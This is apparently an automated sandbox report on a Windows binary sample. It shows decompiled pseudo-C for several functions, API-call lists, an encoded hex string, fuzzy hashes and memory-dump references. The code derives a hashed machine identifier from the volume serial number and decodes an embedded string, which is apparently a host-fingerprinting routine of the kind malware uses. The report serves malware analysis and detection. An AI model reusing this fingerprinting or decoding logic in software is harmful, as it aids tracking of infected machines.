                                                                                                                                                  • Opcode Fuzzy Hash: bcd5c54cbc9c2376efc0c95084c035a21d35561b7397a75f0d0e13e5b2110046
                                                                                                                                                  • Instruction Fuzzy Hash: 92516EB131D68195DE04DB22EA6876E63E2AB9EBCCF880425DE4E4B764EF3DC155C301
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67704790, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 160stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 62%
                                                                                                                                                  			E67704790(signed int __eax, signed int __ebx, void* __ecx, void* __edi, signed int __esi, void* __esp, signed int __rax, signed int __rbx, void* __rcx, signed int __rdx, long long __rsi, long long __rbp, signed int __r8, void* __r9, signed int _a8, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				signed int _v48;
				signed int _v56;
				signed int _v64;
				signed int _v72;
				void* __rdi;
				signed int _t35;
				int _t40;
				int _t41;
				signed int _t45;
				void* _t46;
				signed int _t53;
				void* _t54;
				void* _t60;
				signed int _t62;
				void* _t63;
				signed int _t65;
				int _t68;
				intOrPtr _t72;
				intOrPtr _t78;
				intOrPtr _t80;
				intOrPtr _t82;
				signed int _t93;
				signed int _t107;
				void* _t114;
				signed int _t116;
				signed int _t117;
				signed int _t118;

				_t114 = __r9;
				_t113 = __r8;
				_t104 = __rsi;
				_t99 = __rdx;
				_t66 = __rbx;
				_t65 = __rax;
				_t63 = __esp;
				_t60 = __edi;
				_t54 = __ecx;
				_t53 = __ebx;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				r15d = 0;
				if(__rcx != 0) {
					_t57 = 0x10;
					E67703938(0x10, __esp, __rax, __rbx, 0x67713018, __rsi, __r8);
					_a8 = _t65;
					E67701000(_t66, "98273f69925fa0aa242d26c0665b4ad4306b4eab8172c51e222a5bd08c48c20efbfe1726f0f052bfbf2f0f9a7a968f80165a00797f96b3f46d8d0ea78435c2b6a8e6736ef13866", _t99, __r8);
					_t62 = __esi | 0xffffffff;
					__eflags = _t62;
					r13d = r15d;
					_t107 = _t118;
					_t116 = _t65;
					do {
						_t72 =  *0x67718438; // 0x1dea9f10c20
						__eflags =  *((intOrPtr*)(_t72 + _t107)) - _t118;
						if(__eflags == 0) {
							goto L13;
						} else {
							E677044F8(_t54, _t57, _t60, _t63, __eflags, _t65, _t66,  *((intOrPtr*)(_t72 + _t107)), _t99, _t104, _t107);
							r8d = 0;
							_t57 = 0;
							_t102 = _t65; // executed
							E67705440(0, _t63, _t66, _t65, _t99, _t113); // executed
							_t118 = _t65;
							free(??);
							__eflags = _t118;
							if(__eflags == 0) {
								goto L13;
							} else {
								_t78 =  *0x67718438; // 0x1dea9f10c20
								E677044F8(_t54, 0, _t60, _t63, __eflags, _t65, _t66,  *((intOrPtr*)(_t78 + 0x38)), _t99, _t104, _t107);
								_t80 =  *0x67718438; // 0x1dea9f10c20
								_t66 = _t65;
								E677044F8(_t54, 0, _t60, _t63, __eflags, _t65, _t66,  *((intOrPtr*)(_t80 + 0x40)), _t99, _t104, _t107);
								_t82 =  *0x67718438; // 0x1dea9f10c20
								_t57 =  *_t118;
								r9d =  *(_t82 + 0x4c) & 0x0000ffff;
								_v64 = _t65;
								_t113 = _t116;
								_t102 = _t65;
								_v72 = _t66;
								E67704AFC( *_t118, _t66,  *((intOrPtr*)(_t118 + 8)), _t116); // executed
								_t117 = _t65;
								E677039E8(_t60, _t63, _t65, _t66, _t118, _t65);
								free(??);
								free(??);
								r15d = 0;
								__eflags = _t117;
								if(_t117 == 0) {
									goto L13;
								} else {
									_t40 = lstrlenW();
									__eflags = _t40;
									if(_t40 == 0) {
										goto L13;
									} else {
										_v48 = _t118;
										_v56 = _t118;
										r9d = _t62;
										_t113 = _t117;
										_t57 = 0;
										_t54 = 0xfde9;
										_v64 = r15d;
										_v72 = _t118;
										_t41 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
										_t68 = _t41;
										__eflags = _t41;
										if(_t41 != 0) {
											calloc();
											_v48 = _t118;
											_v56 = _t118;
											r9d = _t62;
											_t113 = _t117;
											_t57 = 0;
											__eflags = 0;
											_t54 = 0xfde9;
											_v64 = _t53;
											_t102 = _t65;
											_v72 = _t65;
											WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
										} else {
											_t60 = r15d;
										}
										free();
										_t99 = _t116;
										E67705B7C(_t53, _t65, _t68, _t102, _t116); // executed
										_t66 = _t65;
										free(??);
										__eflags = _t66;
										if(_t66 == 0) {
											goto L13;
										} else {
											_t45 = E67704A00(_t60, _t63, _t66, _t66, _t102, _t104, _t113); // executed
											_t93 = _t66;
											__eflags = _t45;
											if(_t45 != 0) {
												_t46 = E6770397C(_t54, _t60, _t65, _t66, _t93, _t104);
												free(??);
												_t108 = _a8;
												E67704578(_t46, _t54, _t57, _t66, _t65, _a8, _t114);
												_t66 = _t65;
												E677039E8(_t60, _t63, _t65, _t66, _t65, _t65);
												 *0x67718844 =  *_t66;
												_t102 = 0x67718444;
												memset(_t60, 0, 0x400 << 0);
												_t63 = _t63 + 0xc;
												_t60 = _t60 + 0x400;
												r8d =  *0x67718844; // 0x0
												E6770ED80(0, 0x67718444,  *((intOrPtr*)(_t66 + 8)), _t113);
												E677039E8(_t60, _t63, _t65, _t66, _t66, 0x67718444);
												_t62 = r15d;
											} else {
												free();
												goto L13;
											}
										}
									}
								}
							}
						}
						L15:
						__eflags = _t116;
						if(_t116 != 0) {
							free();
						}
						E677039E8(_t60, _t63, _t65, _t66, _t108, _t102);
						_t35 = _t62;
						goto L18;
						L13:
						r13d = r13d + 1;
						_t107 =  &_a8;
						__eflags = r13d - 5;
					} while (r13d < 5);
					_t108 = _a8;
					goto L15;
				} else {
					_t35 = __eax | 0xffffffff;
				}
				L18:
				return _t35;
			}































                                                                                                                                                  0x67704790
                                                                                                                                                  0x67704790
                                                                                                                                                  0x67704790
                                                                                                                                                  0x67704790
                                                                                                                                                  0x67704790
                                                                                                                                                  0x67704790
                                                                                                                                                  0x67704790
                                                                                                                                                  0x67704790
                                                                                                                                                  0x67704790
                                                                                                                                                  0x67704790
                                                                                                                                                  0x67704790
                                                                                                                                                  0x67704795
                                                                                                                                                  0x6770479a
                                                                                                                                                  0x677047ac
                                                                                                                                                  0x677047b2
                                                                                                                                                  0x677047c3
                                                                                                                                                  0x677047c8
                                                                                                                                                  0x677047d4
                                                                                                                                                  0x677047d9
                                                                                                                                                  0x677047de
                                                                                                                                                  0x677047de
                                                                                                                                                  0x677047e1
                                                                                                                                                  0x677047e4
                                                                                                                                                  0x677047e7
                                                                                                                                                  0x677047ea
                                                                                                                                                  0x677047ea
                                                                                                                                                  0x677047f1
                                                                                                                                                  0x677047f5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677047fb
                                                                                                                                                  0x677047ff
                                                                                                                                                  0x67704804
                                                                                                                                                  0x67704807
                                                                                                                                                  0x6770480c
                                                                                                                                                  0x6770480f
                                                                                                                                                  0x67704817
                                                                                                                                                  0x6770481a
                                                                                                                                                  0x6770481f
                                                                                                                                                  0x67704822
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67704828
                                                                                                                                                  0x67704828
                                                                                                                                                  0x67704833
                                                                                                                                                  0x67704838
                                                                                                                                                  0x67704843
                                                                                                                                                  0x67704846
                                                                                                                                                  0x6770484b
                                                                                                                                                  0x67704852
                                                                                                                                                  0x67704855
                                                                                                                                                  0x6770485e
                                                                                                                                                  0x67704863
                                                                                                                                                  0x67704866
                                                                                                                                                  0x67704869
                                                                                                                                                  0x6770486e
                                                                                                                                                  0x67704876
                                                                                                                                                  0x67704879
                                                                                                                                                  0x67704881
                                                                                                                                                  0x67704889
                                                                                                                                                  0x6770488e
                                                                                                                                                  0x67704891
                                                                                                                                                  0x67704894
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770489a
                                                                                                                                                  0x6770489d
                                                                                                                                                  0x677048a3
                                                                                                                                                  0x677048a5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677048ab
                                                                                                                                                  0x677048ab
                                                                                                                                                  0x677048b0
                                                                                                                                                  0x677048b5
                                                                                                                                                  0x677048b8
                                                                                                                                                  0x677048bb
                                                                                                                                                  0x677048bd
                                                                                                                                                  0x677048c2
                                                                                                                                                  0x677048c7
                                                                                                                                                  0x677048cc
                                                                                                                                                  0x677048d2
                                                                                                                                                  0x677048d5
                                                                                                                                                  0x677048d7
                                                                                                                                                  0x677048e6
                                                                                                                                                  0x677048eb
                                                                                                                                                  0x677048f0
                                                                                                                                                  0x677048f5
                                                                                                                                                  0x677048f8
                                                                                                                                                  0x677048fb
                                                                                                                                                  0x677048fb
                                                                                                                                                  0x677048fd
                                                                                                                                                  0x67704902
                                                                                                                                                  0x67704906
                                                                                                                                                  0x67704909
                                                                                                                                                  0x6770490e
                                                                                                                                                  0x677048d9
                                                                                                                                                  0x677048d9
                                                                                                                                                  0x677048d9
                                                                                                                                                  0x67704917
                                                                                                                                                  0x6770491c
                                                                                                                                                  0x67704922
                                                                                                                                                  0x6770492a
                                                                                                                                                  0x6770492d
                                                                                                                                                  0x67704932
                                                                                                                                                  0x67704935
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67704937
                                                                                                                                                  0x6770493a
                                                                                                                                                  0x6770493f
                                                                                                                                                  0x67704942
                                                                                                                                                  0x67704944
                                                                                                                                                  0x67704996
                                                                                                                                                  0x677049a1
                                                                                                                                                  0x677049a6
                                                                                                                                                  0x677049b1
                                                                                                                                                  0x677049b9
                                                                                                                                                  0x677049bc
                                                                                                                                                  0x677049c3
                                                                                                                                                  0x677049cf
                                                                                                                                                  0x677049db
                                                                                                                                                  0x677049db
                                                                                                                                                  0x677049db
                                                                                                                                                  0x677049dd
                                                                                                                                                  0x677049eb
                                                                                                                                                  0x677049f3
                                                                                                                                                  0x677049f8
                                                                                                                                                  0x67704946
                                                                                                                                                  0x67704946
                                                                                                                                                  0x00000000
                                                                                                                                                  0x67704946
                                                                                                                                                  0x67704944
                                                                                                                                                  0x67704935
                                                                                                                                                  0x677048a5
                                                                                                                                                  0x67704894
                                                                                                                                                  0x67704822
                                                                                                                                                  0x67704961
                                                                                                                                                  0x67704961
                                                                                                                                                  0x67704964
                                                                                                                                                  0x67704969
                                                                                                                                                  0x67704969
                                                                                                                                                  0x67704971
                                                                                                                                                  0x67704976
                                                                                                                                                  0x00000000
                                                                                                                                                  0x6770494b
                                                                                                                                                  0x6770494b
                                                                                                                                                  0x6770494e
                                                                                                                                                  0x67704952
                                                                                                                                                  0x67704952
                                                                                                                                                  0x6770495c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x677047b4
                                                                                                                                                  0x677047b4
                                                                                                                                                  0x677047b4
                                                                                                                                                  0x67704978
                                                                                                                                                  0x67704995

                                                                                                                                                  APIs
                                                                                                                                                  • free.LIBCMT ref: 6770481A
                                                                                                                                                  • free.LIBCMT ref: 67704881
                                                                                                                                                  • free.LIBCMT ref: 67704889
                                                                                                                                                  • lstrlenW.KERNEL32(?,?,?,?,00000000,00000000,?,67706DCB,?,?,00000000,677013F3), ref: 6770489D
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,00000000,00000000,?,67706DCB,?,?,00000000,677013F3), ref: 677048CC
                                                                                                                                                  • free.LIBCMT ref: 67704917
                                                                                                                                                  • free.LIBCMT ref: 6770492D
                                                                                                                                                  • free.LIBCMT ref: 67704946
                                                                                                                                                  • free.LIBCMT ref: 67704969
                                                                                                                                                  Strings
                                                                                                                                                  • 98273f69925fa0aa242d26c0665b4ad4306b4eab8172c51e222a5bd08c48c20efbfe1726f0f052bfbf2f0f9a7a968f80165a00797f96b3f46d8d0ea78435c2b6a8e6736ef13866, xrefs: 677047CD
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free$ByteCharMultiWidelstrlen
                                                                                                                                                  • String ID: 98273f69925fa0aa242d26c0665b4ad4306b4eab8172c51e222a5bd08c48c20efbfe1726f0f052bfbf2f0f9a7a968f80165a00797f96b3f46d8d0ea78435c2b6a8e6736ef13866
                                                                                                                                                  • API String ID: 3214530197-2343934637
                                                                                                                                                  • Opcode ID: 8708f7f06994ded3295dee59c1f5d330c91ede9620dd5054f128e3ed9d46523b
                                                                                                                                                  • Instruction ID: 04638bf088fa5659676b87876adbed2450092b311da7852dbd8dce2c5cd227de
                                                                                                                                                  • Opcode Fuzzy Hash: 8708f7f06994ded3295dee59c1f5d330c91ede9620dd5054f128e3ed9d46523b
                                                                                                                                                  • Instruction Fuzzy Hash: 8A51B1B1319A4086DA10DB27BA58B2AA3D2B7DEFDCF881535DE4E4B714DF39C1529301
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 677034F0, Relevance: 19.6, APIs: 13, Instructions: 119stringCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 54%
                                                                                                                                                  			E677034F0(void* __edi, void* __esp, long long __rbx, long long __rsi) {
				void* __rdi;
				short _t73;
				void* _t85;
				void* _t87;
				void* _t91;
				signed long long _t93;
				signed long long _t94;
				WCHAR* _t132;
				void* _t135;
				signed long long _t136;
				signed long long _t140;
				long long _t142;
				void* _t144;
				signed long long _t145;
				void* _t147;

				_t138 = __rsi;
				_t102 = __rbx;
				 *((long long*)(_t144 + 8)) = __rbx;
				 *((long long*)(_t144 + 0x10)) = _t142;
				 *((long long*)(_t144 + 0x18)) = __rsi;
				_t145 = _t144 - 0x230;
				_t93 =  *0x67716000; // 0x9b7b11e8241
				_t94 = _t93 ^ _t145;
				 *(_t145 + 0x220) = _t94;
				r8d = 0;
				 *((intOrPtr*)(_t145 + 0x38)) = 0;
				 *((long long*)(_t145 + 0x30)) = _t142;
				 *((long long*)(_t145 + 0x28)) = _t142;
				 *((long long*)(_t145 + 0x20)) = _t142;
				GetVolumeInformationW(??, ??, ??, ??, ??, ??, ??, ??); // executed
				r8d =  *((intOrPtr*)(_t145 + 0x40));
				wsprintfW(_t132);
				_t12 = _t142 + 0xb; // 0xb
				E67703938(_t12, __esp, _t94, __rbx, 0x67712e40, __rsi, _t147);
				E677044F8(0, _t12, __edi, __esp, _t91, _t94, _t102, _t94, L"%d", __rsi, _t142);
				_t103 = _t94;
				E677039E8(__edi, __esp, _t94, _t94, _t94, _t94);
				E67703B5C(_t87, _t94, _t94, _t94, _t138);
				free(??);
				lstrcatW(??, ??);
				free(??);
				lstrlenW(??);
				_t17 = _t94 + 2; // 0x2
				E67703938(_t94 + _t17, __esp, _t94, _t103, _t145 + 0x50, _t138, _t147);
				_t135 = _t145 + 0x50;
				_t104 = _t94;
				memset(__edi, 0, 0x1d0 << 0);
				_t85 = __edi + 0x1d0;
				E67703A1C(_t91, _t94, _t94, _t138);
				_t139 = _t94;
				E677039E8(_t85, __esp + 0xc, _t94, _t94, _t104, _t135);
				malloc(??);
				r8d =  *_t94;
				_t105 = _t94;
				E6770ED80(_t135 + 1, _t94,  *((intOrPtr*)(_t94 + 8)), _t147);
				 *((intOrPtr*)(_t135 + _t94)) = bpl;
				E677039E8( *_t94, __esp + 0xc, _t94, _t94, _t139, _t135);
				E677071A0(_t94);
				lstrlenA(??);
				CharUpperBuffA(??, ??); // executed
				E67703B5C(_t87, _t94, _t105, _t105, _t139);
				_t140 = _t94;
				free(??);
				_t23 = _t142 + 0x4e; // 0x4e
				malloc(??);
				_t136 = _t94;
				 *((short*)(_t94 + 0x4c)) = 0;
				_t25 = _t142 + 0x7b; // 0x7b
				 *_t136 = _t25;
				_t26 = _t142 + 0x7d; // 0x7d
				 *((short*)(_t136 + 0x4a)) = _t26;
				_t28 = _t142 + 0x2d; // 0x2d
				_t73 = _t28;
				 *((short*)(_t136 + 0x12)) = _t73;
				 *((short*)(_t136 + 0x1c)) = _t73;
				 *((short*)(_t136 + 0x26)) = _t73;
				 *((short*)(_t136 + 0x30)) = _t73;
				asm("movups xmm0, [esi]");
				asm("movdqu [edi+0x2], xmm0");
				 *((long long*)(_t136 + 0x14)) =  *((intOrPtr*)(_t140 + 0x10));
				 *((long long*)(_t136 + 0x1e)) =  *((intOrPtr*)(_t140 + 0x18));
				 *((long long*)(_t136 + 0x28)) =  *((intOrPtr*)(_t140 + 0x20));
				 *((long long*)(_t136 + 0x32)) =  *((intOrPtr*)(_t140 + 0x28));
				 *((long long*)(_t136 + 0x3a)) =  *((intOrPtr*)(_t140 + 0x30));
				 *((long long*)(_t136 + 0x42)) =  *((intOrPtr*)(_t140 + 0x38));
				free(??);
				return E67706F80(_t23,  *(_t145 + 0x220) ^ _t145);
			}


















                                                                                                                                                  0x677034f0
                                                                                                                                                  0x677034f0
                                                                                                                                                  0x677034f0
                                                                                                                                                  0x677034f5
                                                                                                                                                  0x677034fa
                                                                                                                                                  0x67703500
                                                                                                                                                  0x67703507
                                                                                                                                                  0x6770350e
                                                                                                                                                  0x67703511
                                                                                                                                                  0x67703520
                                                                                                                                                  0x67703523
                                                                                                                                                  0x67703527
                                                                                                                                                  0x67703530
                                                                                                                                                  0x67703535
                                                                                                                                                  0x6770353a
                                                                                                                                                  0x67703540
                                                                                                                                                  0x67703551
                                                                                                                                                  0x67703557
                                                                                                                                                  0x67703561
                                                                                                                                                  0x6770356c
                                                                                                                                                  0x67703574
                                                                                                                                                  0x67703577
                                                                                                                                                  0x6770357f
                                                                                                                                                  0x6770358a
                                                                                                                                                  0x67703597
                                                                                                                                                  0x677035a0
                                                                                                                                                  0x677035aa
                                                                                                                                                  0x677035b5
                                                                                                                                                  0x677035b9
                                                                                                                                                  0x677035be
                                                                                                                                                  0x677035c8
                                                                                                                                                  0x677035cd
                                                                                                                                                  0x677035cd
                                                                                                                                                  0x677035d2
                                                                                                                                                  0x677035da
                                                                                                                                                  0x677035dd
                                                                                                                                                  0x677035e7
                                                                                                                                                  0x677035f0
                                                                                                                                                  0x677035f6
                                                                                                                                                  0x677035f9
                                                                                                                                                  0x67703601
                                                                                                                                                  0x67703605
                                                                                                                                                  0x6770360d
                                                                                                                                                  0x67703615
                                                                                                                                                  0x67703620
                                                                                                                                                  0x67703629
                                                                                                                                                  0x67703631
                                                                                                                                                  0x67703634
                                                                                                                                                  0x67703639
                                                                                                                                                  0x6770363c
                                                                                                                                                  0x67703641
                                                                                                                                                  0x67703644
                                                                                                                                                  0x67703648
                                                                                                                                                  0x6770364b
                                                                                                                                                  0x6770364e
                                                                                                                                                  0x67703651
                                                                                                                                                  0x67703655
                                                                                                                                                  0x67703655
                                                                                                                                                  0x67703658
                                                                                                                                                  0x6770365c
                                                                                                                                                  0x67703660
                                                                                                                                                  0x67703664
                                                                                                                                                  0x67703668
                                                                                                                                                  0x6770366e
                                                                                                                                                  0x67703677
                                                                                                                                                  0x6770367f
                                                                                                                                                  0x67703687
                                                                                                                                                  0x6770368f
                                                                                                                                                  0x67703697
                                                                                                                                                  0x6770369f
                                                                                                                                                  0x677036a3
                                                                                                                                                  0x677036d3

                                                                                                                                                  APIs
                                                                                                                                                  • GetVolumeInformationW.KERNELBASE ref: 6770353A
                                                                                                                                                  • wsprintfW.USER32 ref: 67703551
                                                                                                                                                    • Part of subcall function 677039E8: free.LIBCMT ref: 67703A03
                                                                                                                                                  • free.LIBCMT ref: 6770358A
                                                                                                                                                    • Part of subcall function 67706FA0: HeapFree.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FB6
                                                                                                                                                    • Part of subcall function 67706FA0: _errno.LIBCMT ref: 67706FC0
                                                                                                                                                    • Part of subcall function 67706FA0: GetLastError.KERNEL32(?,?,00000000,67708E28,?,?,?,67708525,?,?,?,?,6770707E), ref: 67706FC8
                                                                                                                                                  • lstrcatW.KERNEL32 ref: 67703597
                                                                                                                                                  • free.LIBCMT ref: 677035A0
                                                                                                                                                  • lstrlenW.KERNEL32 ref: 677035AA
                                                                                                                                                    • Part of subcall function 67703A1C: CryptCreateHash.ADVAPI32 ref: 67703A62
                                                                                                                                                    • Part of subcall function 67703A1C: CryptHashData.ADVAPI32 ref: 67703A76
                                                                                                                                                    • Part of subcall function 67703A1C: CryptGetHashParam.ADVAPI32 ref: 67703A99
                                                                                                                                                    • Part of subcall function 67703A1C: lstrcpyA.KERNEL32 ref: 67703AB5
                                                                                                                                                    • Part of subcall function 67703A1C: free.LIBCMT ref: 67703AC3
                                                                                                                                                    • Part of subcall function 67703A1C: malloc.LIBCMT ref: 67703ACB
                                                                                                                                                    • Part of subcall function 67703A1C: malloc.LIBCMT ref: 67703ADB
                                                                                                                                                    • Part of subcall function 67703A1C: CryptDestroyHash.ADVAPI32 ref: 67703B2C
                                                                                                                                                  • malloc.LIBCMT ref: 677035E7
                                                                                                                                                    • Part of subcall function 67706FE0: _FF_MSGBANNER.LIBCMT ref: 67707010
                                                                                                                                                    • Part of subcall function 67706FE0: RtlAllocateHeap.NTDLL(?,?,?,67703907,?,?,?,67703955,?,?,?,677042F0,?,?,?,67704207), ref: 67707035
                                                                                                                                                    • Part of subcall function 67706FE0: _callnewh.LIBCMT ref: 6770704E
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707059
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707064
                                                                                                                                                  • _strrev.LIBCMT ref: 6770360D
                                                                                                                                                  • lstrlenA.KERNEL32 ref: 67703615
                                                                                                                                                  • CharUpperBuffA.USER32 ref: 67703620
                                                                                                                                                    • Part of subcall function 67703B5C: MultiByteToWideChar.KERNEL32 ref: 67703B90
                                                                                                                                                    • Part of subcall function 67703B5C: calloc.LIBCMT ref: 67703BA5
                                                                                                                                                    • Part of subcall function 67703B5C: MultiByteToWideChar.KERNEL32 ref: 67703BC4
                                                                                                                                                  • free.LIBCMT ref: 67703634
                                                                                                                                                  • malloc.LIBCMT ref: 6770363C
                                                                                                                                                    • Part of subcall function 67706FE0: _callnewh.LIBCMT ref: 67707074
                                                                                                                                                    • Part of subcall function 67706FE0: _errno.LIBCMT ref: 67707079
                                                                                                                                                  • free.LIBCMT ref: 677036A3
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000002.00000002.577887869.0000000067701000.00000020.00020000.sdmp, Offset: 67700000, based on PE: true
                                                                                                                                                  • Associated: 00000002.00000002.577869241.0000000067700000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577922404.0000000067711000.00000002.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577942811.0000000067716000.00000004.00020000.sdmp Download File
                                                                                                                                                  • Associated: 00000002.00000002.577960544.000000006771A000.00000002.00020000.sdmp Download File
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: free$CryptHash_errnomalloc$Char$ByteHeapMultiWide_callnewhlstrlen$AllocateBuffCreateDataDestroyErrorFreeInformationLastParamUpperVolume_strrevcalloclstrcatlstrcpywsprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3058281464-0
                                                                                                                                                  • Opcode ID: 796ad9bc688f7feb0e818bcf119ddd3de20ac76435aadfc3e99f10cf608b6577
                                                                                                                                                  • Instruction ID: eadd6b4dcadb5a8fa43efdb92fd7e6949e699c68a5d478cab53b071acf321e09
                                                                                                                                                  • Opcode Fuzzy Hash: 796ad9bc688f7feb0e818bcf119ddd3de20ac76435aadfc3e99f10cf608b6577
                                                                                                                                                  • Instruction Fuzzy Hash: 75519072218B8596CB14DF62EA5865DB3B1F78DBC8F845025DB8E87B14EF38E164C740
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  Function 67704AFC, Relevance: 16.5, APIs: 13, Instructions: 271COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  C-Code - Quality: 22%
                                                                                                                                                  			E67704AFC(void* __edx, signed long long __rbx, void* __rcx, signed long long __r8) {
				void* __rdi;
				void* __rsi;
				void* __rbp;
				int _t51;
				void* _t55;
				signed char _t61;
				unsigned int _t82;
				void* _t85;
				signed char _t88;
				unsigned int _t98;
				int _t106;
				void* _t107;
				void* _t108;
				signed int _t109;
				void* _t110;
				int _t111;
				unsigned int _t113;
				void* _t115;
				void* _t132;
				signed int _t138;
				signed long long _t139;
				signed long long _t141;
				signed int _t156;
				signed long long _t160;
				int _t167;
				signed int _t173;
				int _t174;
				signed int* _t175;
				char* _t177;
				void* _t178;
				signed int _t180;
				void* _t181;
				signed long long _t184;
				signed long long _t185;
				signed long long _t187;
				signed long long _t188;
				void* _t189;
				signed long long _t190;
				signed long long _t191;
				unsigned int _t194;
				void* _t195;
				int _t196;
				signed long long _t197;
				signed int _t198;
				void* _t200;
				char* _t201;
				signed long long _t205;
				int _t206;
				signed long long _t207;
				int _t209;
				void* _t210;

				_t141 = __rbx;
				_t138 = _t180;
				 *((long long*)(_t138 + 0x10)) = __rbx;
				 *((intOrPtr*)(_t138 + 0x20)) = r9w;
				_t181 = _t180 - 0x40;
				_t82 = 0;
				_t110 = __edx;
				_t210 = __rcx;
				 *((intOrPtr*)(_t138 - 0x50)) = 0;
				r12d = 0xfde9;
				r9d = r13d;
				 *((long long*)(_t138 - 0x58)) = __rbx;
				_t51 = MultiByteToWideChar(_t209, _t206, _t201);
				_t111 = _t51;
				 *(_t181 + 0x80) = _t51;
				malloc(_t196);
				r9d = r13d;
				_t184 = __r8;
				_t85 = r12d;
				 *(_t181 + 0x28) = _t111;
				 *(_t181 + 0x30) = _t138;
				 *(_t181 + 0x20) = _t138;
				MultiByteToWideChar(_t167, _t174, _t177);
				_t207 =  *((intOrPtr*)(_t181 + 0xa8));
				_t197 =  *((intOrPtr*)(_t181 + 0xa0));
				asm("repne scasb");
				asm("repne scasb");
				_t178 =  !( !(_t201 | 0xffffffff) | 0xffffffff) - 1;
				if(__rcx == 0) {
					_t175 = __rbx;
					goto L27;
				} else {
					_t107 = 0;
					_t195 = _t85;
					if(__edx > 0) {
						_t160 = __rcx - _t197;
						do {
							r9d = _t82;
							if(_t111 > 0) {
								_t184 = _t197;
								_t190 =  ~_t197;
								while(( *(_t160 + _t184) & 0x000000ff) ==  *_t184) {
									_t184 = _t184 + 1;
									r9d = r9d + 1;
									_t138 = _t190 + _t184;
									if(_t138 < _t195) {
										continue;
									}
									goto L7;
								}
							}
							L7:
							if(r9d != _t111) {
								goto L8;
							}
							goto L9;
							L8:
							_t107 = _t107 + 1;
							_t160 = _t160 + 1;
						} while (_t107 < _t110);
					}
					L9:
					if(_t107 == _t110) {
						L28:
						_t55 = 0;
					} else {
						_t108 = _t107 + _t111;
						_t194 = r13d;
						_t115 = _t108;
						_t200 = _t108;
						if(_t108 < _t110) {
							_t160 = _t200 - _t207 + _t210;
							do {
								r9d = _t82;
								if(r13d > 0) {
									_t184 = _t207;
									_t190 =  ~_t207;
									while(( *(_t160 + _t184) & 0x000000ff) ==  *_t184) {
										_t184 = _t184 + 1;
										r9d = r9d + 1;
										_t138 = _t190 + _t184;
										if(_t138 < _t194) {
											continue;
										}
										goto L16;
									}
								}
								L16:
								if(r9d != r13d) {
									goto L17;
								}
								break;
								L17:
								_t108 = _t108 + 1;
								_t160 = _t160 + 1;
							} while (_t108 < _t110);
							_t132 = _t108 - _t110;
						}
						if(_t132 == 0 || _t108 < r13d || _t115 > _t108) {
							goto L28;
						} else {
							calloc();
							_t109 = _t108 - _t115;
							_t175 = _t138;
							calloc(??, ??);
							_t160 = _t141;
							_t175[2] = _t138;
							if(_t109 > 0) {
								_t189 = _t200 + _t210;
								r8d = _t109;
								do {
									 *((char*)(_t160 + _t175[2])) =  *((intOrPtr*)(_t189 + _t160));
									_t160 = _t160 + 1;
									_t184 = _t184 - 1;
								} while (_t184 != 0);
							}
							 *_t175 = _t109;
							L27:
							if(_t175 != 0) {
								_t106 =  *(_t181 + 0x80);
								r14d = 2;
								_t55 = calloc(??, ??); // executed
								_t98 = _t82;
								_t198 = _t138;
								if(_t106 != 0) {
									r8d =  *(_t181 + 0x98) & 0x0000ffff;
									do {
										_t98 = _t98 + 1;
										 *_t138 = _t184 + _t160;
										_t138 = _t138 + _t207;
									} while (_t98 < _t106);
								}
								_t139 = _t175[2];
								_t87 =  *_t139;
								if(_t87 < 0xe0 || _t87 > 0xef) {
									if(_t87 >= 0xc2 && _t87 <= 0xdf) {
										_t113 =  *_t175 >> 1;
										calloc(??, ??);
										_t185 = _t141;
										_t187 = _t141;
										r10d = _t113;
										_t205 = _t139;
										if(_t113 > 0) {
											while(_t82 <  *_t175) {
												_t156 = _t175[2];
												_t82 = _t82 + r14d;
												dil =  *(_t156 + _t185);
												dil = dil << 6;
												_t61 =  *((intOrPtr*)(_t156 + _t185 + 1));
												_t185 = _t185 + _t207;
												 *(_t205 + _t187 * 2) = (_t61 & 0x0000003f | dil) & 0x000000ff | (dil >> 0x00000002 & 7) << 0x00000008;
												_t187 = _t187 + 1;
												if(_t187 < _t190) {
													continue;
												} else {
													goto L37;
												}
												goto L46;
											}
										}
										goto L37;
									}
								} else {
									_t113 = 0xaaaaaaab *  *_t175 >> 0x20 >> 1;
									calloc(??, ??);
